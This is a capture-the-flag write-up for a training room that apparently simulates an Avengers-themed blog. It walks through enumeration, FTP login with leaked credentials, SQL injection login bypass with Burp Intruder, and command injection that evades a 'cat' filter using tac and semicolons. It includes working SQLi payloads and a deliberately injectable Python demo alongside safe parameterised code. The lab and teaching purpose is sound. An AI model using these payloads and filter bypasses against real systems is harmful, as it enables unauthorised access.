THM - Avengers Blog

Linux | SQLi

Tools For This Room

TL;DR / Executive Summary

  1. Scan and enumerate with nmap and gobuster

  2. Gain foothold with SQLi

  3. Get final flag by stringing commands together using ; (semi-colon)

Initial nmap scan

This is a fairly simple room which is guided with prompts and multiple flags.

We kick things off with an nmap scan.

  • nmap

nmap -sV -sC -vv <IP>

We get three open ports:

  • 21: FTP

  • 22: SSH

  • 80: HTTP

Checking out port 80 brings us to this entertaining page:

Flag 1: Cookies

Scrolling to the bottom of the page, we find this username/password: groot/iamgroot

We'll be trying that on FTP and SSH later, but first let's enumerate this page fully by checking the page source. At the bottom, we find a hint:

Clicking through to the referenced JavaScript file, we get flag 1:

Flag 2: HTTP Headers

Next, we'll look at the HTTP headers. Open "Inspect Element (Q)" in Firefox, switch to the "Network" tab, and refresh the page so the requests are captured. Selecting the request for the page itself and expanding its response headers, we find flag 2 in a custom header. The same thing can be seen from the terminal with curl -I <IP>, which prints only the response headers.

Flag 3: FTP

Using the previously found combo of groot/iamgroot, let's try logging into FTP.

We're in! We poke around and download flag 3 to our machine to read it:

Gobuster

Looks like we've enumerated what we can from the nmap scan. Let's use gobuster in directory mode against port 80 to see if there are any directories to check out, e.g. gobuster dir -u http://<IP> -w <wordlist>.

We get quite a few results, but the one we should check out is /portal.

SQL Injection

Checking out /portal brings us to a login page:

Unfortunately groot/iamgroot doesn't work here, nor do the typical admin/password combos. Trying iconic lines from the Marvel movies doesn't work either. Boo.

Let's try SQL injection to see whether the login form passes our input straight into a query. We'll use Burp Suite and a list of SQLi auth-bypass payloads from here.

We start Burp Suite, then turn on FoxyProxy in the browser, and:

  1. Enter some placeholder text in the login fields and hit submit. Back in Burp, the "Proxy" tab turns orange, showing the captured request.

  2. Right-click the request, select "Send to Intruder", and move over to the "Intruder" tab.

  3. Click "Clear §" on the right of the page to remove the automatically marked positions, delete the placeholder text from the Username and Password values, and click "Add §" at the end of each so both become payload positions.

  4. Since we're injecting into two positions, choose the Pitchfork attack type. Pitchfork walks the positions in step (the first payload in both fields, then the second in both, and so on), so with a single list it sends the same payload in Username and Password on each request. Cluster Bomb would try every combination instead and take list-length squared requests.

Now we set each payload position to the list we downloaded from the website above.

We start the attack and sort the results by status code or response length. The successful attempts will have a different status code or length from the rest.

Unsuccessful attempt
Successful attempt

We'll notice that the successful attempt redirects to /home instead of /portal. Looks like we can log in with " or true-- as the username (the double quote closes the string the application wraps around our input, or true makes the WHERE clause always match, and -- comments out the rest of the query). Alternatively, we can just use the hint provided:
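The bypass above works because the portal glues our input into its SQL query as text. The following is an added example, not the room's code: a miniature login check over an in-memory SQLite table (constructed here, with made-up credentials) in its vulnerable and parameterised forms, plus a stand-in for the Intruder run that reports which payloads log in. Because this demo quotes values with single quotes, the working payload is ' OR 1=1-- rather than the page's " or true-- (the double-quote variant is in the list to show that a payload only works when its quote matches the application's).

```python
import sqlite3

# Constructed in-memory database standing in for the portal's user table.
# The username and password are made up for the example, not taken from the room.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'example-secret')")
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """Builds the query by string formatting, so quotes in the input become SQL."""
    query = (
        "SELECT username FROM users "
        f"WHERE username = '{username}' AND password = '{password}'"
    )
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Same query with bound parameters: the input is data, never SQL syntax."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


# A short, constructed auth-bypass list in the style of the one fed to Intruder.
PAYLOADS = [
    "admin",            # plain guess: wrong password, fails
    "' OR 1=1-- ",      # closes the string, makes WHERE always true, comments out the rest
    "' OR 'a'='a",      # no comment needed: balances the quotes instead
    "\" OR 1=1-- ",     # the page's double-quote style; only works if the app quotes with "
]


def try_payloads(conn, login):
    """Mimics the Pitchfork run: the same payload goes in both fields each time.
    Returns the payloads that logged in as some user."""
    return [p for p in PAYLOADS if login(conn, p, p) is not None]


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", try_payloads(db, login_vulnerable))
    print("safe:      ", try_payloads(db, login_safe))
```

Sorting Intruder results by length or status is the same idea as the list comprehension in try_payloads: the interesting rows are the ones whose response differs from the failed-login baseline.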

Now that we're in, we view the page's source and find that it has 223 lines of code, which answers the next prompt.

Flag 5: Remote Code Execution and Linux

Looks like we can execute commands via this page. However, the form only accepts one command at a time, so we need a way to run several commands from a single input. In a POSIX shell, that is what the semicolon does.

"You can put two or more commands on the same line separated by the semicolon. All the arguments before (;) will be treated as a separate command from all the arguments after the (;). All the commands will be executed sequentially waiting for each command to finish before starting the new one." - javaTpoint

We try a few commands, but realise that the "cat" command is disallowed. The hint, however, suggests a command that reads a file's content in reverse. We end up with this command:

And we get our flag 5!

Alternatively, we could also use the command:

As the video walkthrough explains, "tac" is a common workaround when "cat" is filtered: it prints the same lines in reverse order, and a filter that only looks for the string "cat" never sees it.
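To make the last two points concrete, here is an added example (not the room's code) of a command runner like the one the page describes: it refuses any command line containing a denylisted word and otherwise hands the line to the shell. The flag file is a constructed temporary file, since the real path and contents are not on the page. It shows cat being blocked, tac reading the same file in reverse, and a semicolon chaining a second command onto the first. It expects GNU coreutils' tac to be installed.

```python
import os
import subprocess
import tempfile

# The word the page's web shell refuses. A substring denylist is what we assume here.
DENYLIST = ["cat"]


def run_filtered(command):
    """Stand-in for the page's one-box command runner.
    Returns None when the command is refused, otherwise the command's stdout."""
    if any(word in command for word in DENYLIST):
        return None
    # shell=True is exactly what makes ';' chaining possible for the attacker.
    result = subprocess.run(command, shell=True, capture_output=True, text=True)
    return result.stdout


def make_flag_file():
    """Constructed stand-in for the flag file (contents are made up).
    Regenerates the random path if it happens to contain a denylisted word,
    so the demo exercises the filter on the command, not on the path."""
    while True:
        fd, path = tempfile.mkstemp(suffix=".txt")
        if not any(word in path for word in DENYLIST):
            break
        os.close(fd)
        os.remove(path)
    with os.fdopen(fd, "w") as f:
        f.write("line one\nline two\nline three\n")
    return path


def demo():
    """Runs the three attempts from the writeup and returns their outputs."""
    path = make_flag_file()
    try:
        return {
            "cat": run_filtered(f"cat {path}"),            # refused by the filter
            "tac": run_filtered(f"tac {path}"),            # same lines, reversed
            "chain": run_filtered(f"echo start; tac {path}"),  # two commands, one input
        }
    finally:
        os.remove(path)


if __name__ == "__main__":
    for name, out in demo().items():
        print(f"{name}: {out!r}")
```

Reading the output bottom-up gives the flag. The general lesson is the one the room is making: a denylist on command names is not a security boundary, because the shell offers many ways to read a file (tac, head, tail, sed, and so on) and a single ; turns one allowed command into an arbitrary command line.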
